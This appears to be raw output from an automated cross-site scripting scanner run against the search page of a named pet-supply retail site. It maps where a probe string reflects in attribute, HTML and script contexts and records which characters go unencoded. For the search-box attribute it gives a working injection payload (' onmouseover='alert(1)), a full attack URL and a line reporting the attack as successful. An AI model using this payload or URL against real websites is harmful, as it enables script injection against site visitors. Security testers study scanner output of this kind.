https://search.entirelypets.com/popular/F

GET Params:[2]
['w', 'ts']
_______________________________________________________________________________________________________
https://search.entirelypets.com/search?w=(uvw"xyz'yxz</zxy&ts=custom

----------------------------------------------------------------------------------
Attribute Context: [1]
<input name="w" type="text" value="(uvw&#034;xyz'yxz /zxy" class="col-xs-9 yui-ac-input searchInput sli_searchbox_textfield" id="sli_search_1" aria-label="You search it, we fetch it!" placeholder="Search by Keyword" autocomplete="off" data-provide="rac"  data-tb-sid="st_searchbox-textfield" data-sli-position="fixed" data-sli-test="searchbox"/>

----------------------------------------------------------------------------------
HTML Context: [2]
<title>Entirely Pets - Search Results for (uvw&#034;xyz'yxz /zxy</title>
<span data-tb-sid="st_no-results-text-keyword" class="sli_no_results_text_keyword">&quot;(uvw&#034;xyz'yxz /zxy&quot;.</span>

----------------------------------------------------------------------------------
Script Context: [4]
<script type="text/javascript">
    window.SLI.facetUrl = "https://search.entirelypets.com/search?lbc=entirelypets&method=or&p=Q&ts=custom&uid=605268400&w=%28uvw%22xyz%27yxz%20%2fzxy";
</script>
<script type="text/javascript">
		(function(window, undefined) {
			window.SLI = window.SLI || {};
			window.SLI.config = window.SLI.config || {};
			SLI.config.ga_pagetype = '';
			SLI.config.ga_domain =
					'www.entirelypets.com'.match(/^[^\.]+?\.?([^\/]+)/i)[0].replace(/^www\./i,'');
			SLI.config.current_url =  '^search?p=Q&ts=custom&w=%28uvw%22xyz%27yxz%20%2fzxy'.replace(/\^/g,"/"); 
      
		})(window);
	</script>
<script language="javascript" type="text/javascript">
			(function() {
				window.sliSpark("sli:pageType", "searchresults");

				window.sliSpark("sli:setBeaconUserId","l5388b0b74d314dcdb3177a05dc03cf");

				window.sliSpark("sli:addSearch", { "keyword": "(uvw&#034;xyz\'yxz /zxy", "totalRecords": "0", "pageNumber": "1", "refinements": [], "sort": "score" });
				

				window.sliSpark('send', 'pageview', {'page': '^search?p=Q&ts=custom&w=%28uvw%22xyz%27yxz%20%2fzxy'.replace(/\^/g,"/")});
			})();
		</script>
<script type="text/javascript">

window.SLI.sliderFacetUrl = 'https://search.entirelypets.com/search?lbc=entirelypets&method=or&p=Q&ts=custom&uid=605268400&w=%28uvw%22xyz%27yxz%20%2fzxy';
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://search.entirelypets.com/search?w=' onmouseover='alert(1)&ts=custom

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input name="w" type="text" value="' onmouseover='alert(1)" class="col-xs-9 yui-ac-input searchInput sli_searchbox_textfield" id="sli_search_1" aria-label="You search it, we fetch it!" placeholder="Search by Keyword" autocomplete="off" data-provide="rac"  data-tb-sid="st_searchbox-textfield" data-sli-position="fixed" data-sli-test="searchbox"/>
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
_______________________________________________________________________________________________________
https://search.entirelypets.com/search?w=&ts=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


